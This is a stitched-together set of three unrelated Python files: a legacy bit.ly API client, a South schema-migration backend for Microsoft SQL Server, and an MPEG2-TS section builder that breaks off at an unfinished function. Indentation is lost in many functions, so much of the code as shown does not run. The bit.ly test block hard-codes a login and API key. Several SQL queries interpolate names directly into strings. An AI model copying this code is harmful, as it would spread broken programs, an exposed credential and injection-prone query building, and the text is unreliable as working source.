# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import urllib,urllib2
import urlparse
import string
# Root endpoint of the (legacy) bit.ly REST API.
BITLY_BASE_URL = "http://api.bit.ly/"
BITLY_API_VERSION = "2.0.1"
# Maps each supported API verb to the name of its URL query parameter;
# an empty string means the verb takes no per-item parameter.
VERBS_PARAM = {
    'shorten':'longUrl',
    'expand':'shortUrl',
    'info':'shortUrl',
    'stats':'shortUrl',
    'errors':'',
    }
class BitlyError(Exception):
    """Base class for errors reported by the bit.ly API."""

    @property
    def message(self):
        """The error text -- the first argument this error was constructed with."""
        return self.args[0]
class Api(object):
""" API class for bit.ly """
def __init__(self, login, apikey):
self.login = login
self.apikey = apikey
self._urllib = urllib2
def shorten(self,longURLs,params={}):
"""
Takes either:
A long URL string and returns shortened URL string
Or a list of long URL strings and returns a list of shortened URL strings.
"""
want_result_list = True
if not isinstance(longURLs, list):
longURLs = [longURLs]
want_result_list = False
for index,url in enumerate(longURLs):
if not '://' in url:
longURLs[index] = "http://" + url
request = self._getURL("shorten",longURLs,params)
result = self._fetchUrl(request)
json = json.loads(result)
self._CheckForError(json)
results = json['results']
res = [self._extract_short_url(results[url]) for url in longURLs]
if want_result_list:
return res
else:
return res[0]
def _extract_short_url(self,item):
if item['shortKeywordUrl'] == "":
return item['shortUrl']
else:
return item['shortKeywordUrl']
def expand(self,shortURL,params={}):
""" Given a bit.ly url or hash, return long source url """
request = self._getURL("expand",shortURL,params)
result = self._fetchUrl(request)
json = json.loads(result)
self._CheckForError(json)
return json['results'][string.split(shortURL, '/')[-1]]['longUrl']
def info(self,shortURL,params={}):
"""
Given a bit.ly url or hash,
return information about that page,
such as the long source url
"""
request = self._getURL("info",shortURL,params)
result = self._fetchUrl(request)
json = json.loads(result)
self._CheckForError(json)
return json['results'][string.split(shortURL, '/')[-1]]
def stats(self,shortURL,params={}):
""" Given a bit.ly url or hash, return traffic and referrer data. """
request = self._getURL("stats",shortURL,params)
result = self._fetchUrl(request)
json = json.loads(result)
self._CheckForError(json)
return Stats.NewFromJsonDict(json['results'])
def errors(self,params={}):
""" Get a list of bit.ly API error codes. """
request = self._getURL("errors","",params)
result = self._fetchUrl(request)
json = json.loads(result)
self._CheckForError(json)
return json['results']
def setUrllib(self, urllib):
'''Override the default urllib implementation.
Args:
urllib: an instance that supports the same API as the urllib2 module
'''
self._urllib = urllib
def _getURL(self,verb,paramVal,more_params={}):
    """Build the full bit.ly API request URL for `verb`.

    paramVal may be a single value or a list; each value is appended to the
    query string under the verb's parameter name from VERBS_PARAM.
    NOTE(review): `more_params={}` is a mutable default; it is only read
    (via params.update) so it is currently harmless.
    """
    if not isinstance(paramVal, list):
        paramVal = [paramVal]
    # Credentials and response format common to every API call.
    params = {
        'version':BITLY_API_VERSION,
        'format':'json',
        'login':self.login,
        'apiKey':self.apikey,
    }
    params.update(more_params)
    params = params.items()
    # NOTE(review): .append() on .items() requires Python 2 (items() is a
    # list there); on Python 3 dict views have no append — confirm target.
    verbParam = VERBS_PARAM[verb]
    if verbParam:
        for val in paramVal:
            params.append(( verbParam,val ))
    encoded_params = urllib.urlencode(params)
    return "%s%s?%s" % (BITLY_BASE_URL,verb,encoded_params)
def _fetchUrl(self,url):
'''Fetch a URL
Args:
url: The URL to retrieve
Returns:
A string containing the body of the response.
'''
# Open and return the URL
url_data = self._urllib.urlopen(url).read()
return url_data
def _CheckForError(self, data):
"""Raises a BitlyError if bitly returns an error message.
Args:
data: A python dict created from the bitly json response
Raises:
BitlyError wrapping the bitly error message if one exists.
"""
# bitly errors are relatively unlikely, so it is faster
# to check first, rather than try and catch the exception
if 'ERROR' in data or data['statusCode'] == 'ERROR':
raise BitlyError, data['errorMessage']
for key in data['results']:
if type(data['results']) is dict and type(data['results'][key]) is dict:
if 'statusCode' in data['results'][key] and data['results'][key]['statusCode'] == 'ERROR':
raise BitlyError, data['results'][key]['errorMessage']
class Stats(object):
    """Statistics returned by the bit.ly API.

    Attributes (read only by convention):
      user_clicks  -- value of the API's 'userClicks' field
      total_clicks -- value of the API's 'clicks' field
    """
    def __init__(self, user_clicks=None, total_clicks=None):
        self.user_clicks = user_clicks
        self.total_clicks = total_clicks

    @staticmethod
    def NewFromJsonDict(data):
        """Create a new instance based on a JSON dict.

        Args:
          data: A JSON dict, as converted from the JSON in the bitly API
        Returns:
          A bitly.Stats instance
        """
        return Stats(
            user_clicks=data.get('userClicks'),
            total_clicks=data.get('clicks'),
        )
if __name__ == '__main__':
    # Smoke-test driver: exercises the Api class against the live bit.ly
    # service (requires network access).
    # NOTE(review/security): the login/apiKey pair is hard-coded in public
    # source; these credentials should be rotated and read from the
    # environment instead.
    # FIX: Python-2-only print statements converted to the call form, which
    # prints identically on Python 2 and 3; renamed `long` which shadowed a
    # builtin.
    testURL1 = "www.yahoo.com"
    testURL2 = "www.cnn.com"
    a = Api(login="pythonbitly", apikey="R_06871db6b7fd31a4242709acaf1b6648")
    short = a.shorten(testURL1)
    print("Short URL = %s" % short)
    short = a.shorten(testURL1, {'history': 1})
    print("Short URL with history = %s" % short)
    urlList = [testURL1, testURL2]
    shortList = a.shorten(urlList)
    print("Short URL list = %s" % shortList)
    expanded = a.expand(short)
    print("Expanded URL = %s" % expanded)
    info = a.info(short)
    print("Info: %s" % info)
    stats = a.stats(short)
    print("User clicks %s, total clicks: %s" % (stats.user_clicks, stats.total_clicks))
    errors = a.errors()
    print("Errors: %s" % errors)
    testURL3 = ["www.google.com"]
    short = a.shorten(testURL3)
    print("Short url in list = %s" % short)
| |
from datetime import date, datetime, time
from warnings import warn
from django.db import models
from django.db.models import fields
from south.db import generic
from south.db.generic import delete_column_constraints, invalidate_table_constraints, copy_column_constraints
from south.exceptions import ConstraintDropped
class DatabaseOperations(generic.DatabaseOperations):
    """
    django-pyodbc (sql_server.pyodbc) implementation of database operations.
    """
    backend_name = "pyodbc"
    # T-SQL templates used by the generic machinery and the methods below.
    add_column_string = 'ALTER TABLE %s ADD %s;'
    alter_string_set_type = 'ALTER COLUMN %(column)s %(type)s'
    alter_string_set_null = 'ALTER COLUMN %(column)s %(type)s NULL'
    alter_string_drop_null = 'ALTER COLUMN %(column)s %(type)s NOT NULL'
    # MSSQL cannot combine multiple ALTERs into one statement here.
    allows_combined_alters = False
    drop_index_string = 'DROP INDEX %(index_name)s ON %(table_name)s'
    drop_constraint_string = 'ALTER TABLE %(table_name)s DROP CONSTRAINT %(constraint_name)s'
    delete_column_string = 'ALTER TABLE %s DROP COLUMN %s'
    #create_check_constraint_sql = "ALTER TABLE %(table)s " + \
    #                              generic.DatabaseOperations.add_check_constraint_fragment
    create_foreign_key_sql = "ALTER TABLE %(table)s ADD CONSTRAINT %(constraint)s " + \
                             "FOREIGN KEY (%(column)s) REFERENCES %(target)s"
    create_unique_sql = "ALTER TABLE %(table)s ADD CONSTRAINT %(constraint)s UNIQUE (%(columns)s)"
    default_schema_name = "dbo"
    # Booleans are stored as BIT 0/1 (see _fix_field_definition).
    has_booleans = False
    @delete_column_constraints
    def delete_column(self, table_name, name):
        """Drop column `name` from `table_name`.

        Indexes, constraints and any DEFAULT that reference the column are
        dropped first, then the column itself.
        """
        q_table_name, q_name = (self.quote_name(table_name), self.quote_name(name))

        # Zap the indexes
        for ind in self._find_indexes_for_column(table_name,name):
            params = {'table_name':q_table_name, 'index_name': ind}
            sql = self.drop_index_string % params
            self.execute(sql, [])

        # Zap the constraints
        for const in self._find_constraints_for_column(table_name,name):
            params = {'table_name':q_table_name, 'constraint_name': const}
            sql = self.drop_constraint_string % params
            self.execute(sql, [])

        # Zap default if exists
        drop_default = self.drop_column_default_sql(table_name, name)
        if drop_default:
            sql = "ALTER TABLE [%s] %s" % (table_name, drop_default)
            self.execute(sql, [])

        # Finally zap the column itself
        self.execute(self.delete_column_string % (q_table_name, q_name), [])
    def _find_indexes_for_column(self, table_name, name):
        "Find the indexes that apply to a column, needed when deleting"
        # NOTE(review): table/column names are interpolated into the SQL
        # string instead of being bound as parameters; values come from
        # migration code rather than end users, but confirm before reuse.
        sql = """
        SELECT si.name, si.id, sik.colid, sc.name
        FROM dbo.sysindexes SI WITH (NOLOCK)
        INNER JOIN dbo.sysindexkeys SIK WITH (NOLOCK)
            ON  SIK.id = Si.id
            AND SIK.indid = SI.indid
        INNER JOIN dbo.syscolumns SC WITH (NOLOCK)
            ON  SI.id = SC.id
            AND SIK.colid = SC.colid
        WHERE SI.indid !=0
            AND Si.id = OBJECT_ID('%s')
            AND SC.name = '%s'
        """
        idx = self.execute(sql % (table_name, name), [])
        # Only the index name (first column of each row) is needed.
        return [i[0] for i in idx]
def _find_constraints_for_column(self, table_name, name, just_names=True):
"""
Find the constraints that apply to a column, needed when deleting. Defaults not included.
This is more general than the parent _constraints_affecting_columns, as on MSSQL this
includes PK and FK constraints.
"""
sql = """
SELECT CC.[CONSTRAINT_NAME]
,TC.[CONSTRAINT_TYPE]
,CHK.[CHECK_CLAUSE]
,RFD.TABLE_SCHEMA
,RFD.TABLE_NAME
,RFD.COLUMN_NAME
-- used for normalized names
,CC.TABLE_NAME
,CC.COLUMN_NAME
FROM [INFORMATION_SCHEMA].[TABLE_CONSTRAINTS] TC
JOIN INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE CC
ON TC.CONSTRAINT_CATALOG = CC.CONSTRAINT_CATALOG
AND TC.CONSTRAINT_SCHEMA = CC.CONSTRAINT_SCHEMA
AND TC.CONSTRAINT_NAME = CC.CONSTRAINT_NAME
LEFT JOIN INFORMATION_SCHEMA.CHECK_CONSTRAINTS CHK
ON CHK.CONSTRAINT_CATALOG = CC.CONSTRAINT_CATALOG
AND CHK.CONSTRAINT_SCHEMA = CC.CONSTRAINT_SCHEMA
AND CHK.CONSTRAINT_NAME = CC.CONSTRAINT_NAME
AND 'CHECK' = TC.CONSTRAINT_TYPE
LEFT JOIN INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS REF
ON REF.CONSTRAINT_CATALOG = CC.CONSTRAINT_CATALOG
AND REF.CONSTRAINT_SCHEMA = CC.CONSTRAINT_SCHEMA
AND REF.CONSTRAINT_NAME = CC.CONSTRAINT_NAME
AND 'FOREIGN KEY' = TC.CONSTRAINT_TYPE
LEFT JOIN INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE RFD
ON RFD.CONSTRAINT_CATALOG = REF.UNIQUE_CONSTRAINT_CATALOG
AND RFD.CONSTRAINT_SCHEMA = REF.UNIQUE_CONSTRAINT_SCHEMA
AND RFD.CONSTRAINT_NAME = REF.UNIQUE_CONSTRAINT_NAME
WHERE CC.CONSTRAINT_CATALOG = CC.TABLE_CATALOG
AND CC.CONSTRAINT_SCHEMA = CC.TABLE_SCHEMA
AND CC.TABLE_CATALOG = %s
AND CC.TABLE_SCHEMA = %s
AND CC.TABLE_NAME = %s
AND CC.COLUMN_NAME = %s
"""
db_name = self._get_setting('name')
schema_name = self._get_schema_name()
table = self.execute(sql, [db_name, schema_name, table_name, name])
if just_names:
return [r[0] for r in table]
all = {}
for r in table:
cons_name, type = r[:2]
if type=='PRIMARY KEY' or type=='UNIQUE':
cons = all.setdefault(cons_name, (type,[]))
cons[1].append(r[7])
elif type=='CHECK':
cons = (type, r[2])
elif type=='FOREIGN KEY':
if cons_name in all:
raise NotImplementedError("Multiple-column foreign keys are not supported")
else:
cons = (type, r[3:6])
else:
raise NotImplementedError("Don't know how to handle constraints of type "+ type)
all[cons_name] = cons
return all
@invalidate_table_constraints
def alter_column(self, table_name, name, field, explicit_name=True, ignore_constraints=False):
"""
Alters the given column name so it will match the given field.
Note that conversion between the two by the database must be possible.
Will not automatically add _id by default; to have this behavour, pass
explicit_name=False.
@param table_name: The name of the table to add the column to
@param name: The name of the column to alter
@param field: The new field definition to use
"""
self._fix_field_definition(field)
if not ignore_constraints:
qn = self.quote_name
sch = qn(self._get_schema_name())
tab = qn(table_name)
table = ".".join([sch, tab])
constraints = self._find_constraints_for_column(table_name, name, False)
for constraint in constraints.keys():
params = dict(table_name = table,
constraint_name = qn(constraint))
sql = self.drop_constraint_string % params
self.execute(sql, [])
ret_val = super(DatabaseOperations, self).alter_column(table_name, name, field, explicit_name, ignore_constraints=True)
if not ignore_constraints:
unique_field_handled = False
for cname, (ctype,args) in constraints.items():
params = dict(table = table,
constraint = qn(cname))
if ctype=='UNIQUE':
if len(args)==1:
unique_field_handled = True #
if len(args)>1 or field.unique:
params['columns'] = ", ".join(map(qn,args))
sql = self.create_unique_sql % params
else:
continue
elif ctype=='PRIMARY KEY':
params['columns'] = ", ".join(map(qn,args))
sql = self.create_primary_key_string % params
elif ctype=='FOREIGN KEY':
continue
# Foreign keys taken care of below
#target = "%s.%s(%s)" % tuple(map(qn,args))
#params.update(column = qn(name), target = target)
#sql = self.create_foreign_key_sql % params
elif ctype=='CHECK':
warn(ConstraintDropped("CHECK "+ args, table_name, name))
continue
#TODO: Some check constraints should be restored; but not before the generic
# backend restores them.
#params['check'] = args
#sql = self.create_check_constraint_sql % params
else:
raise NotImplementedError("Don't know how to handle constraints of type "+ type)
self.execute(sql, [])
# Create unique constraint if necessary
if field.unique and not unique_field_handled:
self.create_unique(table_name, (name,))
# Create foreign key if necessary
if field.rel and self.supports_foreign_keys:
self.execute(
self.foreign_key_sql(
table_name,
field.column,
field.rel.to._meta.db_table,
field.rel.to._meta.get_field(field.rel.field_name).column
)
)
return ret_val
    def _alter_set_defaults(self, field, name, params, sqls):
        "Subcommand of alter_column that sets default values (overrideable)"
        # First drop the current default if one exists
        table_name = self.quote_name(params['table_name'])
        drop_default = self.drop_column_default_sql(table_name, name)
        if drop_default:
            sqls.append((drop_default, []))
        # Next, set any default
        if field.has_default():
            default = field.get_default()
            # Render the default as an unquoted literal, then quote it as a
            # T-SQL string for the ADD DEFAULT clause.
            literal = self._value_to_unquoted_literal(field, default)
            sqls.append(('ADD DEFAULT %s for %s' % (self._quote_string(literal), self.quote_name(name),), []))
    def _value_to_unquoted_literal(self, field, value):
        """Convert a Python default value to its unquoted SQL literal form."""
        # Start with the field's own translation
        conn = self._get_connection()
        value = field.get_db_prep_save(value, connection=conn)
        # This is still a Python object -- nobody expects to need a literal.
        if isinstance(value, basestring):
            return smart_unicode(value)
        elif isinstance(value, (date,time,datetime)):
            return value.isoformat()
        else:
            #TODO: Anybody else needs special translations?
            return str(value)
        # NOTE(review): `basestring` and `smart_unicode` are Python-2-era
        # names that must be imported/defined elsewhere in this module.
def _default_value_workaround(self, value):
if isinstance(value, (date,time,datetime)):
return value.isoformat()
else:
return super(DatabaseOperations, self)._default_value_workaround(value)
def _quote_string(self, s):
return "'" + s.replace("'","''") + "'"
    def drop_column_default_sql(self, table_name, name, q_name=None):
        "MSSQL specific drop default, which is a pain"
        # DEFAULTs are separate named constraint objects on MSSQL; look up
        # the auto-generated name so it can be dropped by name.
        sql = """
        SELECT object_name(cdefault)
        FROM syscolumns
        WHERE id = object_id('%s')
        AND name = '%s'
        """
        cons = self.execute(sql % (table_name, name), [])
        if cons and cons[0] and cons[0][0]:
            return "DROP CONSTRAINT %s" % cons[0][0]
        # No default constraint exists for this column.
        return None
    def _fix_field_definition(self, field):
        """Normalise boolean field defaults to BIT-compatible 1/0 values."""
        if isinstance(field, (fields.BooleanField, fields.NullBooleanField)):
            if field.default == True:
                field.default = 1
            if field.default == False:
                field.default = 0
    # This is copied from South's generic add_column, with two modifications:
    # 1) The sql-server-specific call to _fix_field_definition
    # 2) Removing a default, when needed, by calling drop_default and not the more general alter_column
    @invalidate_table_constraints
    def add_column(self, table_name, name, field, keep_default=True):
        """
        Adds the column 'name' to the table 'table_name'.
        Uses the 'field' parameter, a django.db.models.fields.Field instance,
        to generate the necessary sql

        @param table_name: The name of the table to add the column to
        @param name: The name of the column to add
        @param field: The field to use
        """
        self._fix_field_definition(field)
        sql = self.column_sql(table_name, name, field)
        if sql:
            params = (
                self.quote_name(table_name),
                sql,
            )
            sql = self.add_column_string % params
            self.execute(sql)

            # Now, drop the default if we need to
            if not keep_default and field.default is not None:
                field.default = fields.NOT_PROVIDED
                #self.alter_column(table_name, name, field, explicit_name=False, ignore_constraints=True)
                self.drop_default(table_name, name, field)
@invalidate_table_constraints
def drop_default(self, table_name, name, field):
fragment = self.drop_column_default_sql(table_name, name)
if fragment:
table_name = self.quote_name(table_name)
sql = " ".join(["ALTER TABLE", table_name, fragment])
self.execute(sql)
@invalidate_table_constraints
def create_table(self, table_name, field_defs):
# Tweak stuff as needed
for _, f in field_defs:
self._fix_field_definition(f)
# Run
generic.DatabaseOperations.create_table(self, table_name, field_defs)
    def _find_referencing_fks(self, table_name):
        "MSSQL does not support cascading FKs when dropping tables, we need to implement."

        # FK -- Foreign Keys
        # UCTU -- Unique Constraints Table Usage
        # FKTU -- Foreign Key Table Usage
        # (last two are both really CONSTRAINT_TABLE_USAGE, different join conditions)
        sql = """
        SELECT FKTU.TABLE_SCHEMA as REFING_TABLE_SCHEMA,
               FKTU.TABLE_NAME as REFING_TABLE_NAME,
               FK.[CONSTRAINT_NAME] as FK_NAME
        FROM [INFORMATION_SCHEMA].[REFERENTIAL_CONSTRAINTS] FK
        JOIN [INFORMATION_SCHEMA].[CONSTRAINT_TABLE_USAGE] UCTU
            ON FK.UNIQUE_CONSTRAINT_CATALOG = UCTU.CONSTRAINT_CATALOG and
               FK.UNIQUE_CONSTRAINT_NAME = UCTU.CONSTRAINT_NAME and
               FK.UNIQUE_CONSTRAINT_SCHEMA = UCTU.CONSTRAINT_SCHEMA
        JOIN [INFORMATION_SCHEMA].[CONSTRAINT_TABLE_USAGE] FKTU
            ON FK.CONSTRAINT_CATALOG = FKTU.CONSTRAINT_CATALOG and
               FK.CONSTRAINT_NAME = FKTU.CONSTRAINT_NAME and
               FK.CONSTRAINT_SCHEMA = FKTU.CONSTRAINT_SCHEMA
        WHERE FK.CONSTRAINT_CATALOG = %s
          AND UCTU.TABLE_SCHEMA = %s -- REFD_TABLE_SCHEMA
          AND UCTU.TABLE_NAME = %s -- REFD_TABLE_NAME
        """
        db_name = self._get_setting('name')
        schema_name = self._get_schema_name()
        # Rows: (referencing schema, referencing table, FK constraint name).
        return self.execute(sql, [db_name, schema_name, table_name])
@invalidate_table_constraints
def delete_table(self, table_name, cascade=True):
"""
Deletes the table 'table_name'.
"""
if cascade:
refing = self._find_referencing_fks(table_name)
for schmea, table, constraint in refing:
table = ".".join(map (self.quote_name, [schmea, table]))
params = dict(table_name = table,
constraint_name = self.quote_name(constraint))
sql = self.drop_constraint_string % params
self.execute(sql, [])
cascade = False
super(DatabaseOperations, self).delete_table(table_name, cascade)
@copy_column_constraints
@delete_column_constraints
def rename_column(self, table_name, old, new):
"""
Renames the column of 'table_name' from 'old' to 'new'.
WARNING - This isn't transactional on MSSQL!
"""
if old == new:
# No Operation
return
# Examples on the MS site show the table name not being quoted...
params = (table_name, self.quote_name(old), self.quote_name(new))
self.execute("EXEC sp_rename '%s.%s', %s, 'COLUMN'" % params)
@invalidate_table_constraints
def rename_table(self, old_table_name, table_name):
"""
Renames the table 'old_table_name' to 'table_name'.
WARNING - This isn't transactional on MSSQL!
"""
if old_table_name == table_name:
# No Operation
return
params = (self.quote_name(old_table_name), self.quote_name(table_name))
self.execute('EXEC sp_rename %s, %s' % params)
_db_type_for_alter_column = generic.alias("_db_positive_type_for_alter_column")
_alter_add_column_mods = generic.alias("_alter_add_positive_check")
    @invalidate_table_constraints
    def delete_foreign_key(self, table_name, column):
        """Drop the FK on `table_name`.`column` and its implied index."""
        super(DatabaseOperations, self).delete_foreign_key(table_name, column)
        # A FK also implies a non-unique index
        find_index_sql = """
        SELECT i.name -- s.name, t.name, c.name
        FROM sys.tables t
        INNER JOIN sys.schemas s ON t.schema_id = s.schema_id
        INNER JOIN sys.indexes i ON i.object_id = t.object_id
        INNER JOIN sys.index_columns ic ON ic.object_id = t.object_id
        INNER JOIN sys.columns c ON c.object_id = t.object_id
            AND ic.column_id = c.column_id
        WHERE i.is_unique=0 AND i.is_primary_key=0 AND i.is_unique_constraint=0
          AND s.name = %s
          AND t.name = %s
          AND c.name = %s
        """
        schema = self._get_schema_name()
        indexes = self.execute(find_index_sql, [schema, table_name, column])
        qn = self.quote_name
        # Drop every plain (non-unique, non-PK) index on the column.
        for index in (i[0] for i in indexes):
            self.execute("DROP INDEX %s on %s.%s" % (qn(index), qn(schema), qn(table_name) ))
| |
"""section builder
Provides a set of functions to build a basic MPEG2-TS PSI section.
"""
# CRC-32/MPEG-2 lookup table (polynomial 0x04C11DB7, MSB-first).
# NOTE(review): this table is not referenced by calculate_crc() below, which
# computes the CRC bit-by-bit; presumably kept for a table-driven variant —
# confirm before removing.
CRC32 = [
    0x00000000, 0x04c11db7, 0x09823b6e, 0x0d4326d9, 0x130476dc, 0x17c56b6b,
    0x1a864db2, 0x1e475005, 0x2608edb8, 0x22c9f00f, 0x2f8ad6d6, 0x2b4bcb61,
    0x350c9b64, 0x31cd86d3, 0x3c8ea00a, 0x384fbdbd, 0x4c11db70, 0x48d0c6c7,
    0x4593e01e, 0x4152fda9, 0x5f15adac, 0x5bd4b01b, 0x569796c2, 0x52568b75,
    0x6a1936c8, 0x6ed82b7f, 0x639b0da6, 0x675a1011, 0x791d4014, 0x7ddc5da3,
    0x709f7b7a, 0x745e66cd, 0x9823b6e0, 0x9ce2ab57, 0x91a18d8e, 0x95609039,
    0x8b27c03c, 0x8fe6dd8b, 0x82a5fb52, 0x8664e6e5, 0xbe2b5b58, 0xbaea46ef,
    0xb7a96036, 0xb3687d81, 0xad2f2d84, 0xa9ee3033, 0xa4ad16ea, 0xa06c0b5d,
    0xd4326d90, 0xd0f37027, 0xddb056fe, 0xd9714b49, 0xc7361b4c, 0xc3f706fb,
    0xceb42022, 0xca753d95, 0xf23a8028, 0xf6fb9d9f, 0xfbb8bb46, 0xff79a6f1,
    0xe13ef6f4, 0xe5ffeb43, 0xe8bccd9a, 0xec7dd02d, 0x34867077, 0x30476dc0,
    0x3d044b19, 0x39c556ae, 0x278206ab, 0x23431b1c, 0x2e003dc5, 0x2ac12072,
    0x128e9dcf, 0x164f8078, 0x1b0ca6a1, 0x1fcdbb16, 0x018aeb13, 0x054bf6a4,
    0x0808d07d, 0x0cc9cdca, 0x7897ab07, 0x7c56b6b0, 0x71159069, 0x75d48dde,
    0x6b93dddb, 0x6f52c06c, 0x6211e6b5, 0x66d0fb02, 0x5e9f46bf, 0x5a5e5b08,
    0x571d7dd1, 0x53dc6066, 0x4d9b3063, 0x495a2dd4, 0x44190b0d, 0x40d816ba,
    0xaca5c697, 0xa864db20, 0xa527fdf9, 0xa1e6e04e, 0xbfa1b04b, 0xbb60adfc,
    0xb6238b25, 0xb2e29692, 0x8aad2b2f, 0x8e6c3698, 0x832f1041, 0x87ee0df6,
    0x99a95df3, 0x9d684044, 0x902b669d, 0x94ea7b2a, 0xe0b41de7, 0xe4750050,
    0xe9362689, 0xedf73b3e, 0xf3b06b3b, 0xf771768c, 0xfa325055, 0xfef34de2,
    0xc6bcf05f, 0xc27dede8, 0xcf3ecb31, 0xcbffd686, 0xd5b88683, 0xd1799b34,
    0xdc3abded, 0xd8fba05a, 0x690ce0ee, 0x6dcdfd59, 0x608edb80, 0x644fc637,
    0x7a089632, 0x7ec98b85, 0x738aad5c, 0x774bb0eb, 0x4f040d56, 0x4bc510e1,
    0x46863638, 0x42472b8f, 0x5c007b8a, 0x58c1663d, 0x558240e4, 0x51435d53,
    0x251d3b9e, 0x21dc2629, 0x2c9f00f0, 0x285e1d47, 0x36194d42, 0x32d850f5,
    0x3f9b762c, 0x3b5a6b9b, 0x0315d626, 0x07d4cb91, 0x0a97ed48, 0x0e56f0ff,
    0x1011a0fa, 0x14d0bd4d, 0x19939b94, 0x1d528623, 0xf12f560e, 0xf5ee4bb9,
    0xf8ad6d60, 0xfc6c70d7, 0xe22b20d2, 0xe6ea3d65, 0xeba91bbc, 0xef68060b,
    0xd727bbb6, 0xd3e6a601, 0xdea580d8, 0xda649d6f, 0xc423cd6a, 0xc0e2d0dd,
    0xcda1f604, 0xc960ebb3, 0xbd3e8d7e, 0xb9ff90c9, 0xb4bcb610, 0xb07daba7,
    0xae3afba2, 0xaafbe615, 0xa7b8c0cc, 0xa379dd7b, 0x9b3660c6, 0x9ff77d71,
    0x92b45ba8, 0x9675461f, 0x8832161a, 0x8cf30bad, 0x81b02d74, 0x857130c3,
    0x5d8a9099, 0x594b8d2e, 0x5408abf7, 0x50c9b640, 0x4e8ee645, 0x4a4ffbf2,
    0x470cdd2b, 0x43cdc09c, 0x7b827d21, 0x7f436096, 0x7200464f, 0x76c15bf8,
    0x68860bfd, 0x6c47164a, 0x61043093, 0x65c52d24, 0x119b4be9, 0x155a565e,
    0x18197087, 0x1cd86d30, 0x029f3d35, 0x065e2082, 0x0b1d065b, 0x0fdc1bec,
    0x3793a651, 0x3352bbe6, 0x3e119d3f, 0x3ad08088, 0x2497d08d, 0x2056cd3a,
    0x2d15ebe3, 0x29d4f654, 0xc5a92679, 0xc1683bce, 0xcc2b1d17, 0xc8ea00a0,
    0xd6ad50a5, 0xd26c4d12, 0xdf2f6bcb, 0xdbee767c, 0xe3a1cbc1, 0xe760d676,
    0xea23f0af, 0xeee2ed18, 0xf0a5bd1d, 0xf464a0aa, 0xf9278673, 0xfde69bc4,
    0x89b8fd09, 0x8d79e0be, 0x803ac667, 0x84fbdbd0, 0x9abc8bd5, 0x9e7d9662,
    0x933eb0bb, 0x97ffad0c, 0xafb010b1, 0xab710d06, 0xa6322bdf, 0xa2f33668,
    0xbcb4666d, 0xb8757bda, 0xb5365d03, 0xb1f740b4]
def create_section_data_block(data_length):
    """Create a block of data to represent a section

    Creates a list of the given size and returns it. The list will have every
    byte set to 0xff. This is because reserved bits are normally set to 1

    Arguments:
    data_length -- amount of bytes needed for the data block

    Returns:
    A list of bytes of the desired length with 0xff in every byte
    """
    # FIX: docstring previously claimed "zero in every byte" while the code
    # fills with 0xff; the 0xff fill is correct (reserved bits default to 1).
    return [0xff] * data_length
def set_table_id(data, table_id):
    """Write `table_id` into byte 0 of a section block.

    Arguments:
    data -- List of bytes. Data to manipulate
    table_id -- the table id to set

    Returns:
    the table id that was written
    """
    data[0] = table_id
    return table_id
def set_section_syntax_indicator(data, indicator):
    """Write the section syntax indicator flag into a section block.

    The indicator occupies bit 7 of byte 1; all other bits are preserved.

    Arguments:
    data -- List of bytes. Data to manipulate
    indicator -- Boolean value to set the indicator to
    """
    data[1] &= 0x7f
    if indicator:
        data[1] |= 0x80
def set_private_indicator(data, indicator):
    """Write the private section indicator into a section block.

    The indicator occupies bit 6 of byte 1; all other bits are preserved.

    Arguments:
    data -- List of bytes. Data to manipulate
    indicator -- Boolean value to set the indicator to
    """
    data[1] &= 0xbf
    if indicator:
        data[1] |= 0x40
def set_section_length(data, section_length):
    """Write the 12-bit section length into a section block.

    The high nibble goes into the low 4 bits of byte 1 (upper bits kept),
    the low byte into byte 2.

    Arguments:
    data -- List of bytes. Data to manipulate
    section_length -- value to set
    """
    high_nibble = (section_length & 0x0f00) >> 8
    low_byte = section_length & 0x00ff
    data[1] = (data[1] & 0xf0) | high_nibble
    data[2] = low_byte
# Table body 2
def set_table_id_extension(data, table_id_extension):
    """Write the 16-bit table id extension into bytes 3-4 of a section block.

    Arguments:
    data -- List of bytes. Data to manipulate
    table_id_extension -- value to set
    """
    high, low = divmod(table_id_extension & 0xffff, 256)
    data[3] = high
    data[4] = low
def set_version_number(data, version):
    """Write the 5-bit version number into a section block.

    The version occupies bits 1-5 of byte 5; the surrounding bits
    (current/next indicator and the two reserved bits) are preserved.

    Arguments:
    data -- List of bytes. Data to manipulate
    version -- value to set
    """
    kept_bits = data[5] & 0xc1
    data[5] = kept_bits | ((version << 1) & 0x3e)
def set_current_next_indicator(data, indicator):
    """Write the current/next indicator into a section block.

    The indicator occupies bit 0 of byte 5; all other bits are preserved.

    Arguments:
    data -- List of bytes. Data to manipulate
    indicator -- Boolean value to set the indicator to
    """
    data[5] &= 0xfe
    if indicator:
        data[5] |= 0x01
def set_section_number(data, section_number):
    """Write the section number (low 8 bits) into byte 6 of a section block.

    Arguments:
    data -- List of bytes. Data to manipulate
    section_number -- value to set
    """
    data[6] = section_number & 0xff
def set_last_section_number(data, last_section_number):
    """Write the last section number (low 8 bits) into byte 7 of a section block.

    Arguments:
    data -- List of bytes. Data to manipulate
    last_section_number -- value to set
    """
    data[7] = last_section_number & 0xff
def set_data(data, payload, offset):
    """Copy `payload` into a section block starting at `offset`.

    Fills every position from `offset` to the end of `data`, so the payload
    must supply at least that many bytes (including any trailing CRC bytes).

    Arguments:
    data -- List of bytes. Data to manipulate
    payload -- payload bytes
    offset -- the byte at which the data should start
    """
    for target_index in range(offset, len(data)):
        data[target_index] = payload[target_index - offset]
def calculate_crc(data):
    """Calculate the CRC from a block of section data

    Bit-by-bit MPEG-2 CRC-32 (polynomial 0x04C11DB7, init 0xFFFFFFFF,
    no reflection, no final XOR), processed MSB first.

    Arguments:
    data -- List of bytes. Data to checksum

    Return:
    the CRC as a list of four big-endian bytes
    """
    # FIX: the 0xffffffffL literals were Python-2-only long syntax, which is
    # a SyntaxError on Python 3; plain ints behave identically on both.
    polynomial = 0x4c11db7
    crc32 = 0xffffffff
    for byte in data:
        for bit in range(7, -1, -1):  # MSB to LSB
            top_bit = crc32 >> 31
            crc32 = (crc32 << 1) & 0xffffffff
            if ((byte >> bit) & 1) ^ top_bit:
                crc32 ^= polynomial
    # Emit the 32-bit CRC as four big-endian bytes.
    return [(crc32 >> shift) & 0xff for shift in (24, 16, 8, 0)]
def append_crc(data):
